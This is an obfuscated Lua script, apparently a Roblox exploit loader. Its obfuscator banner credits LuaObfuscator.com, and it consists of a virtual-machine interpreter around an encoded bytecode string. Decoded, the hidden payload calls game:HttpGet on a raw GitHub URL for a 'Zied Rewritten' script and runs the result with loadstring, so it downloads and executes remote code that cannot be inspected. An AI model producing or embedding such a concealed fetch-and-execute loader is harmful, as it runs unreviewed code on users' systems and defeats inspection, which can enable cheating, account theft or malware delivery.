--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v82,v19);v19=nil;v89=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%((3 -1)^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-(620 -(555 + 64)))) + 1)) ;return v83-(v83%((838 + 94) -(857 + 74))) ;else local v84=568 -(367 + 201) ;local v85;while true do if (v84==(0 -0)) then v85=(929 -(214 + 713))^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * 65536) + (v39 * (472 -216)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1,370 -(87 + 263) ) * (((32 + 150) -(67 + 113))^(24 + 8))) + v42 ;local v46=v20(v43,51 -30 ,31);local v47=((v20(v43,24 + 8 )==(1 -0)) and  -(3 -2)) or 1 ;if (v46==(952 -(802 + 150))) then if (v45==(0 -0)) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=997 -(915 + 82) ;end elseif (v46==2047) then return ((v45==((0 + 0) -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -(793 -(368 + 423)))^((354 -241) -61)))) ;end local function v25(v48) local v49=430 -(44 + (1409 -1023)) ;local v50;local v51;while true do if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(1487 -(998 + 488)) );v18=v18 + v48 ;v49=20 -(10 + 8) ;end if (v49==(7 -5)) then v51={};for v91=(1573 -1130) -(416 + 26) , #v50 do v51[v91]=v2(v1(v3(v50,v91,v91)));end v49=9 -6 ;end if (v49==(0 + (859 -(814 + 45)))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=439 -(145 + 293) ;end if (v49==(2 + (2 -1))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0 + 0 ;end)();while true do if (v66~=(1 + 0)) then else if (v52==0) then v53=(function() return function(v106,v107,v108) local v109=(function() return 396 -(115 + 281) ;end)();local v110=(function() return;end)();while true do if (v109~=0) then else v110=(function() return 0;end)();while true do if (v110==(0 -0)) then local v173=(function() return 0;end)();while true do if (v173~=(0 + 0)) then else v106[v107-#"," ]=(function() return v108();end)();return v106,v107,v108;end end end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v56=(function() return {};end)();v52=(function() return 1;end)();end break;end if ((0 -0)~=v66) then else if (2~=v52) then else v57[ #"-19"]=(function() return v21();end)();for v98= #"~",v23() do local v99=(function() return v21();end)();if (v20(v99, #".", #"~")~=(0 -0)) then else local v124=(function() return 0;end)();local v125=(function() return;end)();local v126=(function() return;end)();local v127=(function() return;end)();local v128=(function() return;end)();while true do if (v124==1) then local v160=(function() return 867 -(550 + 317) ;end)();while true do if (v160==0) then v127=(function() return nil;end)();v128=(function() return nil;end)();v160=(function() return 1;end)();end if (v160==(1 -0)) then v124=(function() return 2 -0 ;end)();break;end end end if (v124~=2) then else while true do if (v125==2) then local v177=(function() return 0 -0 ;end)();while true do if (v177==0) then if (v20(v127, #"!", #">")== #"|") then v128[287 -(134 + 151) ]=(function() return v59[v128[1667 -(970 + 695) ]];end)();end if (v20(v127,3 -1 ,1992 -(582 + 1408) )== #"~") then v128[ #"91("]=(function() return v59[v128[ #"xxx"]];end)();end v177=(function() return 1;end)();end if (v177==(3 -2)) then v125=(function() return  #"91(";end)();break;end end end if ( #"19("==v125) then if (v20(v127, #"xxx", #"xnx")== #"}") then v128[ #"0836"]=(function() return v59[v128[ #"0836"]];end)();end v54[v98]=(function() return v128;end)();break;end if (v125== #"}") then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (0~=v179) then else v180=(function() return 0 -0 ;end)();while true do if (v180==(3 -2)) then v125=(function() return 1826 -(1195 + 629) ;end)();break;end if (v180~=(0 -0)) then else v128=(function() return {v22(),v22(),nil,nil};end)();if (v126==0) then local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if (v189~=0) then else v190=(function() return 241 -(187 + 54) ;end)();while true do if (v190~=(780 -(162 + 618))) then else v128[ #"19("]=(function() return v22();end)();v128[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v126== #">") then v128[ #"nil"]=(function() return v23();end)();elseif (v126==(2 + 0)) then v128[ #"19("]=(function() return v23() -(2^16) ;end)();elseif (v126~= #"xxx") then else local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if ((0 + 0)~=v195) then else v196=(function() return 0;end)();while true do if ((0 -0)==v196) then v128[ #"gha"]=(function() return v23() -((2 -0)^(2 + 14)) ;end)();v128[ #"0313"]=(function() return v22();end)();break;end end break;end end end v180=(function() return 1637 -(1373 + 263) ;end)();end end break;end end end if (v125==(1000 -(451 + 549))) then local v181=(function() return 0 + 0 ;end)();local v182=(function() return;end)();while true do if (0~=v181) then else v182=(function() return 0 -0 ;end)();while true do if (v182==(1 -0)) then v125=(function() return  #" ";end)();break;end if (v182~=0) then else v126=(function() return v20(v99,2, #"-19");end)();v127=(function() return v20(v99, #".com",6);end)();v182=(function() return 1385 -(746 + 638) ;end)();end end break;end end end end break;end if (v124==(0 + 0)) then local v161=(function() return 0;end)();local v162=(function() return;end)();while true do if (v161==0) then v162=(function() return 0 -0 ;end)();while true do if (v162~=0) then else v125=(function() return 341 -(218 + 123) ;end)();v126=(function() return nil;end)();v162=(function() return 1582 -(1535 + 46) ;end)();end if (v162==1) then v124=(function() return 1;end)();break;end end break;end end end end end end for v100= #"|",v23() do v55,v100,v28=(function() return v53(v55,v100,v28);end)();end return v57;end if (v52==1) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v59=(function() return {};end)();for v101= #"!",v58 do local v102=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v102~=(1 + 0)) then else v105=(function() return nil;end)();while true do if (v103==(0 + 0)) then local v165=(function() return 0;end)();while true do if (v165==1) then v103=(function() return 1;end)();break;end if (0~=v165) then else v104=(function() return v21();end)();v105=(function() return nil;end)();v165=(function() return 1;end)();end end end if ((561 -(306 + 254))~=v103) then else if (v104== #",") then v105=(function() return v21()~=(0 + 0) ;end)();elseif (v104==2) then v105=(function() return v24();end)();elseif (v104~= #"asd") then else v105=(function() return v25();end)();end v59[v101]=(function() return v105;end)();break;end end break;end if (0~=v102) then else local v129=(function() return 0;end)();while true do if (v129~=1) then else v102=(function() return 1;end)();break;end if (v129==0) then v103=(function() return 0 -0 ;end)();v104=(function() return nil;end)();v129=(function() return 1;end)();end end end end end v52=(function() return 1469 -(899 + 568) ;end)();end v66=(function() return 1 + 0 ;end)();end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[(909 -(244 + 60)) -(268 + 335) ];local v65=v60[293 -(60 + 230) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=573 -(426 + 113 + 33) ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(812 -((1587 -(697 + 321)) + (659 -417))) ;local v76={};local v77={};for v86=0 -(1001 -(938 + 63)) ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 + 0 ];else v77[v86]=v74[v86 + ((2171 -1146) -(706 + 318)) ];end end local v78=(v75-v69) + (1252 -(721 + (1221 -691))) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1272 -(945 + 326) ];if (v80<=(7 -4)) then if ((432<588) and (v80<=(2 -1))) then if (v80==(0 + 0 + 0)) then v77[v79[2]]();else do return;end end elseif (v80==(702 -(271 + 429))) then v77[v79[2 + 0 + 0 ]]=v62[v79[1503 -(1408 + 92) ]];else local v113=1086 -(461 + 625) ;local v114;local v115;local v116;local v117;local v118;while true do if ((4797>=3895) and (v113==(1293 -(993 + (552 -257))))) then v114=377 -((1267 -(936 + 189)) + 235) ;for v163=v118,v72 do local v164=(0 -0) + 0 ;while true do if (v164==((2398 -(322 + 905)) -(418 + 753))) then v114=v114 + 1 + 0 ;v77[v163]=v115[v114];break;end end end v71=v71 + 1 ;v79=v67[v71];v118=v79[(612 -(602 + 9)) + 1 ];v113=(1195 -(449 + 740)) + 0 ;end if (v113==(3 + 4)) then v79=v67[v71];do return;end break;end if ((3577==3577) and (v113==(1 + (874 -(826 + 46))))) then v77[v118 + (530 -(134 + 272 + 123)) ]=v117;v77[v118]=v117[v79[1773 -(1749 + 20) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1324 -((3946 -2697) + 73) ]]=v79[(2 + 4) -3 ];v113=2 + 2 ;end if (v113==(1149 -(466 + 679))) then v71=v71 + ((1900 -(260 + 1638)) -1) ;v79=v67[v71];v118=v79[5 -3 ];v115,v116=v70(v77[v118](v13(v77,v118 + ((444 -(382 + 58)) -(1616 -(1565 + 48))) ,v79[1903 -(106 + 1794) ])));v72=(v116 + v118) -(754 -(239 + (1648 -1134))) ;v113=2 + 0 + (1141 -(782 + 356)) ;end if (v113==(0 + 0)) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v77[v79[5 -(3 + 0) ]]={};v113=2 -1 ;end if (v113==(120 -(4 + 110))) then v77[v118]=v77[v118](v13(v77,v118 + ((1208 -623) -(57 + (1566 -1039))) ,v72));v71=v71 + (1203 -(373 + 829)) ;v79=v67[v71];v77[v79[1429 -(41 + (2591 -(902 + 303))) ]]();v71=v71 + (268 -(176 + 91)) ;v113=110 -(17 + 86) ;end if (v113==(1 + 0)) then v71=v71 + (1 -0) ;v79=v67[v71];v77[v79[3 -1 ]]=v62[v79[3 + 0 ]];v71=v71 + (1 -(0 -0)) ;v79=v67[v71];v113=1 + 1 ;end if (v113==(4 -2)) then v77[v79[2 -0 ]]=v62[v79[3]];v71=v71 + (2 -1) ;v79=v67[v71];v118=v79[168 -((317 -195) + 44) ];v117=v77[v79[339 -(144 + 192) ]];v113=5 -2 ;end end end elseif (v80<=(16 -11)) then if ((3794>3693) and (v80==((5 -1) + 0))) then v77[v79[1 + 1 ]]=v79[5 -2 ];else v77[v79[67 -(30 + 35) ]]={};end elseif (v80<=(5 + 1)) then local v122=v79[1582 -(102 + 1081 + 397) ];v77[v122]=v77[v122](v13(v77,v122 + (2 -(1093 -(975 + 117))) ,v72));elseif (v80==7) then local v130=1257 -(1043 + 214) ;local v131;local v132;while true do if (v130==(1 + (1690 -(1121 + 569)))) then v77[v131 + ((1878 -(157 + 1718)) -2) ]=v132;v77[v131]=v132[v79[1216 -(323 + 889) ]];break;end if ((v130==(0 + 0)) or (1275==4100)) then v131=v79[5 -3 ];v132=v77[v79[583 -(361 + 219) ]];v130=321 -(53 + 267) ;end end else local v133=0 + 0 ;local v134;local v135;local v136;local v137;while true do if ((v133==0) or (1591>=3580)) then v134=v79[(6 + 1) -5 ];v135,v136=v70(v77[v134](v13(v77,v134 + (414 -(15 + (1412 -1014))) ,v79[3])));v133=983 -(18 + 964) ;end if (v133==(7 -5)) then for v174=v134,v72 do v137=v137 + 1 + 0 ;v77[v174]=v135[v137];end break;end if ((983<=1808) and (v133==(1 + 0))) then v72=(v136 + v134) -(1 -(0 -0)) ;v137=850 -(20 + 830) ;v133=2 + 0 ;end end end v71=v71 + (127 -(116 + 10)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F5472656E6479536372697074732F5A6965642D52657772692Q74656E2F726566732F68656164732F6D61696E2F5A69656425323052657772692Q74656E00094Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...); 
